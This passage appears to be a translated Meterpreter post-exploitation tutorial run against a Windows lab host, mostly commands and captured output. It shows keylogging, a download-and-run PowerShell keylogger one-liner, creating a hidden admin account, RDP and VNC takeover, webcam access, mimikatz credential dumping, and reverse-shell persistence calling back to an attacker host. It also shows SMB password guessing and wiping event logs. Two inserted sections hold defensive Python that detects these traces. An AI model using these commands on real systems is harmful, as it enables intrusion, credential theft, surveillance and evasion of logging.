 1112  1176  sQoycPhez.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\sQoycPhez.exe
 1176  524   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1212  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 1268  524   msdtc.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  
 1320  524   Ext2Srv.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\Ext2Fsd\Ext2Srv.exe
 1364  524   imdsksvc.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\imdsksvc.exe
 1412  524   VGAuthService.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1456  524   vmtoolsd.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1584  524   taskhost.exe            x64   3                                      C:\Windows\system32\taskhost.exe
 1732  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 1796  524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  
 1956  524   dllhost.exe             x64   0        NT AUTHORITY\SYSTEM           
 1996  648   WmiPrvSE.exe                                                         
 2284  1088  csrss.exe               x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 2408  2732  SearchFilterHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchFilterHost.exe
 2496  2272  explorer.exe            x64   3                                      C:\Windows\Explorer.EXE
 2596  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 2668  524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
 2732  524   SearchIndexer.exe       x64   0        NT AUTHORITY\SYSTEM           
 2828  1176  xmutGkHXf.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\xmutGkHXf.exe
 2840  1176  TeyQCXoY.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\TeyQCXoY.exe
 3020  1176  plKeHIXhzUQQ.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\plKeHIXhzUQQ.exe
 3220  1176  maBudFEovnC.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\maBudFEovnC.exe
 3384  1176  wLBliAR.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\wLBliAR.exe
 3456  2912  csrss.exe               x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 3748  816   audiodg.exe             x64   0                                      
 3784  2732  SearchProtocolHost.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchProtocolHost.exe
 3944  2496  vmtoolsd.exe            x64   3                                      C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 4024  1176  dtUmbNlfMa.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\dtUmbNlfMa.exe
 4060  2912  winlogon.exe            x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe

meterpreter > getpid
Current pid: 1176
meterpreter > 


winlogon.exe has pid 4060, and the current meterpreter pid is 1176. Now bind to the process:
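Read from the defender's side, the `ps` listing above already shows what a compromise of this kind leaves behind: several x86 executables with random names running from C:\Windows\TEMP as SYSTEM, all with pid 1176 (spoolsv.exe, the process hosting the meterpreter session) as parent. The Python script below is an added example, not part of the original post: it parses the fixed-width `ps` table by the header's column offsets and flags that pattern. The input is a constructed subset of the listing above copied in its original layout; `SERVICE_PARENTS` and `TEMP_MARKERS` are assumptions chosen for this example, and the same parser works for the full listing.

```python
"""
Added example (not from the original post): parse the fixed-width process
table printed by meterpreter's `ps` and flag the pattern visible in the
listing above: executables running from C:\\Windows\\TEMP as SYSTEM with a
service process (spoolsv.exe) as parent.
"""
import re

# Constructed subset of the `ps` output above, copied in its original layout.
SAMPLE_PS = r"""
Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                  x64   0
 340   908   dwm.exe                 x64   3                                      C:\Windows\system32\Dwm.exe
 524   412   services.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 1032  1176  QwdqufeOMpX.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\QwdqufeOMpX.exe
 1176  524   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1456  524   vmtoolsd.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2828  1176  xmutGkHXf.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\xmutGkHXf.exe
 4060  2912  winlogon.exe            x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
"""

# Assumptions for this example: parents that should not normally spawn
# executables, and path fragments that mark user-writable temp locations.
SERVICE_PARENTS = {"spoolsv.exe", "lsass.exe"}
TEMP_MARKERS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\")


def parse_ps_table(text):
    """Slice each row at the header's column offsets; return a list of dicts."""
    lines = text.splitlines()
    header_idx = next(i for i, line in enumerate(lines)
                      if line.split()[:2] == ["PID", "PPID"])
    columns = [(m.group().lower(), m.start())
               for m in re.finditer(r"\S+", lines[header_idx])]
    rows = []
    for line in lines[header_idx + 1:]:
        if not line.strip() or set(line.strip()) <= {"-", " "}:
            continue  # blank line or the dashed separator
        row = {}
        for j, (name, start) in enumerate(columns):
            end = columns[j + 1][1] if j + 1 < len(columns) else None
            row[name] = line[start:end].strip()  # short rows yield '' columns
        row["pid"] = int(row["pid"])
        row["ppid"] = int(row["ppid"])
        rows.append(row)
    return rows


def flag_suspicious(processes):
    """Return processes whose image lives in a temp directory, with reasons."""
    by_pid = {p["pid"]: p for p in processes}
    flagged = []
    for p in processes:
        path = p["path"].lower()
        if not any(marker in path for marker in TEMP_MARKERS):
            continue
        reasons = ["image runs from a temp directory"]
        if "SYSTEM" in p["user"].upper():
            reasons.append("runs as SYSTEM")
        parent = by_pid.get(p["ppid"])
        parent_name = parent["name"] if parent else "?"
        if parent_name.lower() in SERVICE_PARENTS:
            reasons.append(f"spawned by service process {parent_name}")
        flagged.append({"pid": p["pid"], "name": p["name"],
                        "parent": parent_name, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for f in flag_suspicious(parse_ps_table(SAMPLE_PS)):
        print(f'{f["pid"]:>5} {f["name"]:<20} parent={f["parent"]}: {"; ".join(f["reasons"])}')
```

The same three signals (image in a temp directory, SYSTEM context, spoolsv.exe as parent) are what an endpoint rule on process-creation events would key on; parsing the meterpreter table is only a convenient way to try the logic on the data this page provides.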

meterpreter > migrate 4060
[*] Migrating from 1176 to 4060...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 4060
meterpreter > 

Binding succeeded, and meterpreter's pid has migrated to the target process.

  2. Capture keystrokes

meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > 

Now, at the victim machine's logon screen, enter the password to log in. Then:

meterpreter > keyscan_dump 
Dumping captured keystrokes...
admin<CR>


meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter > 

The victim's input "admin" was captured, followed by Enter, so the password is "admin".

  • keylogrecorder

meterpreter > run keylogrecorder -h

[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
Keylogger Recorder Meterpreter Script
This script will start the Meterpreter Keylogger and save all keys
in a log file for later anlysis. To stop capture hit Ctrl-C
Usage:
OPTIONS:

    -c <opt>  Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration.  Default is 2.
    -h        Help menu.
    -k        Kill old Process
    -l        Lock screen when capturing Winlogon credentials.
    -t <opt>  Time interval in seconds between recollection of keystrokes, default 30 seconds.

meterpreter > run keylogrecorder -c 0

[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
[*] 	explorer.exe Process found, migrating into 2764
[*] Migration Successful!!
[*] 	explorer.exe Process found, migrating into 928
meterpreter > run keylogrecorder -c 0

[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
meterpreter > 

No keystrokes were captured; this attempt failed.

  • Get-Keystrokes

Download the PowerShell script https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1, upload it to the target host, then run:

PS D:\> Import-Module .\Get-Keystrokes.ps1
PS D:\> Get-Keystrokes -LogPath c:\windows\temp\key.log
PS D:\> 

All keystrokes are logged to key.log.

Alternatively, run the following command:

PS D:\> iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-Keystrokes.ps1'); Get-Keystrokes -LogPath c:\windows\temp\key.log

##Adding a new user

  • run getgui
meterpreter > run getgui -u xman666 -p admin

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] 	Adding User: xman666 with Password: admin
[-] Account could not be created
[-] Error:
[-] 	命令成功完成。
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.2058.rc
meterpreter > shell
Process 4020 created.
Channel 54 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>net user xman666
net user xman666
用户名                 xman666
全名                   
注释                   
用户的注释             
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2019/10/13 11:20:58
密码到期               2019/11/24 11:20:58
密码可更改             2019/10/13 11:20:58
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本               
用户配置文件           
主目录                 
上次登录               从不

可允许的登录小时数     All

本地组成员             *Users                
全局组成员             *None                 
命令成功完成。


C:\Windows\system32>

Here the user was created, but adding it to the Administrators group failed.

  • Command line
meterpreter > shell
Process 2816 created.
Channel 52 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>net user
net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    XinSai                   
xman666                  
命令运行完毕,但发生一个或多个错误。

C:\Windows\system32>net user test test /add
net user test test /add
命令成功完成。


C:\Windows\system32>net user
net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    test                     
XinSai                   xman666                  
命令运行完毕,但发生一个或多个错误。


A user test with password test has been added. Check the user's details:

C:\Windows\system32>net user test
net user test
用户名                 test
全名                   
注释                   
用户的注释             
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2019/10/13 11:11:32
密码到期               2019/11/24 11:11:32
密码可更改             2019/10/13 11:11:32
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本               
用户配置文件           
主目录                 
上次登录               2019/10/13 11:12:03

可允许的登录小时数     All

本地组成员             *Users                
全局组成员             *None                 
命令成功完成。


C:\Windows\system32>

The user belongs to the Users group and is not an administrator; next, add it to the Administrators group.

C:\Windows\system32>net localgroup administrators test /add

net localgroup administrators test /add
命令成功完成。


C:\Windows\system32>net user test
net user test
用户名                 test
全名                   
注释                   
用户的注释             
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2019/10/13 11:11:32
密码到期               2019/11/24 11:11:32
密码可更改             2019/10/13 11:11:32
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本               
用户配置文件           
主目录                 
上次登录               2019/10/13 11:12:03

可允许的登录小时数     All

本地组成员             *Administrators       *Users                
全局组成员             *None                 
命令成功完成。


C:\Windows\system32>

User test now belongs to both the Administrators and Users groups.

##Logging in remotely with the new user

  1. Enable Remote Desktop (RDP)
meterpreter > run post/windows/manage/enable_rdp 

[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20191012054909_default_192.168.8.129_host.windows.cle_038774.txt
meterpreter > 

The following command achieves the same result:

meterpreter > run getgui -e

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] 	RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] 	Terminal Services service is already set to auto
[*] 	Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.5056.rc
meterpreter > 

  1. Pre-login check

Before connecting over Remote Desktop, check how long the victim user has been idle, because a remote logon kicks off the currently logged-in user and the logon process also shows an explicit prompt:

meterpreter > idletime
User has been idle for: 3 hours 48 mins 26 secs
meterpreter > 

  1. Connect to the target desktop with rdesktop
root@kali:~# rdesktop 192.168.1.8
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16


A GUI window pops up; enter the username/password to log in.

##Hiding the account

The newly added user is visible on the target machine's logon screen, so it needs to be hidden.

Omitted.

##Port forwarding

Next, forward port 3389 on the remote machine 192.168.1.8 to local port 9833, then connect to local port 9833; this gives the same Remote Desktop access.

meterpreter > portfwd add -l 9833 -r 192.168.1.8 -p 3389
[*] Local TCP relay created: :9833 <-> 192.168.1.8:3389
meterpreter > 

Port forwarding succeeded; now connect locally with rdesktop:

root@kali:~# rdesktop 127.0.0.1:9833
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
root@kali:~# 

The GUI window appears and the username/password login succeeds.

##Screenshot

meterpreter > screenshot
Screenshot saved to: /root/aAKvRlgG.jpeg
meterpreter > 

##Webcam operations

  • List webcams

    webcam_list
    
  • Take a photo from a specified webcam

    webcam_snap
    
  • Stream live video from a specified webcam

    webcam_stream
    

##VNC control

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\QwdqufeOMpX.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
meterpreter > /usr/bin/vncviewer: VNC server closed connection


I don't know why it failed; after testing, I found that this error appears when the victim machine is at the lock screen or a standard user is logged in.

When an administrator user is logged in, running the command again succeeds, as follows:

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\plKeHIXhzUQQ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
meterpreter > No authentication needed
Authentication successful
Desktop name "pc"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding


The VNC graphical window opens successfully, showing the victim's desktop.

##File operations

Common commands such as cd, ls, cat, rm and mkdir can be used in meterpreter.

  • Upload a file
meterpreter > upload /root/flag.txt
[*] uploading  : /root/flag.txt -> flag.txt
[*] Uploaded 9.00 B of 9.00 B (100.0%): /root/flag.txt -> flag.txt
[*] uploaded   : /root/flag.txt -> flag.txt
meterpreter > 

Use pwd to view the current directory, i.e. where the file was uploaded to.

  • Run a file
meterpreter > execute -i -f cmd.exe
Process 1020 created.
Channel 40 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\>

For example, upload mimikatz and run execute -i -f mimikatz.exe to enter mimikatz's interactive prompt.

Then run the following commands to retrieve passwords:

privilege::debug
sekurlsa::logonpasswords

Options of the execute command:

-f specify the executable file

-i interact with the process

-H create a hidden process

-a arguments to pass to the command

-m execute from memory

-s execute the process in the given session

-t run the process with the currently impersonated thread token

  • Download a file
meterpreter > download "c:\Windows\System32\drivers\etc\hosts"
[*] Downloading: c:\Windows\System32\drivers\etc\hosts -> hosts
[*] Downloaded 824.00 B of 824.00 B (100.0%): c:\Windows\System32\drivers\etc\hosts -> hosts
[*] download   : c:\Windows\System32\drivers\etc\hosts -> hosts
meterpreter > 

##Persistence

  • Startup folder

    Use msfvenom to generate a reverse-shell backdoor, then place it in the following path on the target machine so that it runs automatically at startup:

    C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    

    We then only need to listen on the corresponding port.

  • System service

meterpreter > run persistence -X -i 5 -p 8888 -r 192.168.1.6

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/PC_20191013.2138/PC_20191013.2138.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8888
[*] Persistent agent script is 99669 bytes long
[+] Persistent Script written to C:\Windows\TEMP\OueYyJlRdu.vbs
[*] Executing script C:\Windows\TEMP\OueYyJlRdu.vbs
[+] Agent executed with PID 3776
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
meterpreter > 

persistence option reference:

-X start at boot; -i interval between reconnection attempts; -r host to connect back to; -p port to connect back to

Every 5 seconds it connects back to 192.168.1.6 on port 8888, as follows:

root@kali:~# nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.8] 49195

It remains effective after the target machine reboots.

In a real scenario, a Metasploit-style handler is still used to wait for the callback:

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.6:8888 
[*] Sending stage (179779 bytes) to 192.168.1.8
[*] Meterpreter session 2 opened (192.168.1.6:8888 -> 192.168.1.8:49267) at 2019-10-13 01:05:56 -0400

meterpreter > getuid
Server username: PC\xman666
meterpreter > 

Persistence has to take antivirus and similar defences into account; here it triggers an alert.

##Lateral movement

Obtain subnet information

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > 

Use a Metasploit module to find servers on this LAN with port 3389 open.

use auxiliary/scanner/rdp/rdp_scanner
set rhosts 10.0.15.10-33
run

Scan SMB logins

use auxiliary/scanner/smb/smb_login
set RHOSTS  10.0.15.10-33
set SMBUser administrator
set SMBPass 123456a?
run

remotewinenum

Sometimes you cannot log in to another Windows machine directly over Remote Desktop. In that case, the Enter-PSSession command can be used to log in to the remote Windows machine through a PowerShell terminal; this requires port 5985 or 5986 to be open on the accessed machine. By default, Windows Server 2008 and Windows Server 2012 enable the WinRM server automatically, exposing port 5985 or 5986.

Enter-PSSession -computerName Server-R2

##Clearing traces

meterpreter > clearev
[*] Wiping 8202 records from Application...
[*] Wiping 23907 records from System...
[*] Wiping 8154 records from Security...
meterpreter > 
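As a defender-side counterpart to the account creation, Run-key persistence and log clearing shown in the sections above (an added example, not part of the original post), the following Python triages a stream of Windows event records. The records are constructed, simplified dicts rather than real exports; the event IDs are the standard Windows Security/Eventlog and Sysmon IDs, and the autorun key path and TEMP drop directory are the ones visible in the persistence output above.

```python
import re

# Autorun key path and the TEMP drop directory, both visible in the post's output.
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
TEMP_SCRIPT = re.compile(r"\\Windows\\TEMP\\[^\\]+\.(vbs|exe|ps1|bat)\b", re.I)
LOG_CLEAR = {1102: "Security", 104: None}  # 104 names its channel in the record


def classify(event):
    """Return a one-line finding for a simplified event record, or None."""
    eid = event["EventID"]
    who = event.get("SubjectUserName", "?")
    if eid == 4720:  # A user account was created
        return f"account created: {event['TargetUserName']} (by {who})"
    if eid == 4732 and event.get("TargetUserName", "").lower() == "administrators":
        return f"added to Administrators: {event['MemberName']} (by {who})"
    if eid == 13 and RUN_KEY.search(event.get("TargetObject", "")):  # Sysmon: registry value set
        data = event.get("Details", "")
        severity = "HIGH" if TEMP_SCRIPT.search(data) else "review"
        return f"autorun value set [{severity}]: {event['TargetObject']} -> {data}"
    if eid in LOG_CLEAR:  # 1102 = Security audit log cleared, 104 = another channel cleared
        channel = LOG_CLEAR[eid] or event.get("Channel", "?")
        return f"{channel} log cleared (by {who})"
    return None


def triage(events):
    """Run classify() over a record list and keep only the findings, in order."""
    return [f for f in map(classify, events) if f]


# Constructed sample records; the VMware entry is a made-up benign control.
SAMPLE_EVENTS = [
    {"EventID": 4624, "SubjectUserName": "XinSai", "LogonType": 2},
    {"EventID": 4720, "SubjectUserName": "SYSTEM", "TargetUserName": "test"},
    {"EventID": 4732, "SubjectUserName": "SYSTEM", "TargetUserName": "Administrators",
     "MemberName": "PC\\test"},
    {"EventID": 13, "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT",
     "Details": r"wscript.exe C:\Windows\TEMP\OueYyJlRdu.vbs"},
    {"EventID": 13, "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VMware User Process",
     "Details": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr"},
    {"EventID": 104, "Channel": "Application", "SubjectUserName": "SYSTEM"},
    {"EventID": 104, "Channel": "System", "SubjectUserName": "SYSTEM"},
    {"EventID": 1102, "SubjectUserName": "SYSTEM"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

Note that clearev leaves the 1102/104 clear events themselves as the last records of each log, so those two IDs are the cheapest signal to forward to a collector that the host cannot wipe.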
